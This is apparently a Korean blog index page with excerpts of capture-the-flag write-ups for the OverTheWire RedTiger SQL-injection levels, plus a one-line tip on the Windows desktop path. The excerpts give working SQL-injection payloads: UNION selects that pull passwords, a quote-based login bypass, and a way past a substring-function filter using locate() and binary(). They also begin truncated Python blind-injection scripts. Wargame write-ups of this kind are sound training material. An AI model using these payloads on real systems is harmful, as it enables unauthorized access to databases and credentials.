본문 바로가기
728x90

분류 전체보기20

[OverTheWire RedTiger] level 7 간단한 blind sql injection. 그런데 substr, left, right, mid 함수에 필터링이 걸려있다. 위를 대체할 만한 함수를 찾으면 되는데, mysql reference를 보던 중 locate 라는 쓸만한 함수 발견~ python re 모듈의 finditer 랑 비슷한 느낌이다. 당연히 hex로도 들어간다. 하지만 대소문자 구분을 하지 않는데, 이는 binary() 함수로 감싸줌으로써 해결할 수 있다. import urllib2 import string from urllib import urlencode headers = {"Cookie":"level7login="} def pwn(param): params = { "search":"{param}".format( param=para.. 2022. 1. 10.
[OverTheWire RedTiger] level 1-5 Level 1 id = 1 union select 1,2,password ,4 from level1_users Level 2 id : 1' or '1'='1 pw : 1' or '1'='1 Level 3 preg_match error 유발 -> source auditing 'urlcrypt.inc' encrypt 함수 그대로 이용해서 injection 시도 encrypt("' union select 1,2,3,username,password,6,7 from level3_users where username='admin'#") Level 4 blind 할 때, ascii 안 쓰고 substr()=0x61 이런 식으로 바로 비교할 수 있다. import urllib2 import time import str.. 2022. 1. 10.
윈도우 바탕화면 절대경로 %systemdrive%\users\%username%\desktop 2022. 1. 10.
728x90

티스토리툴바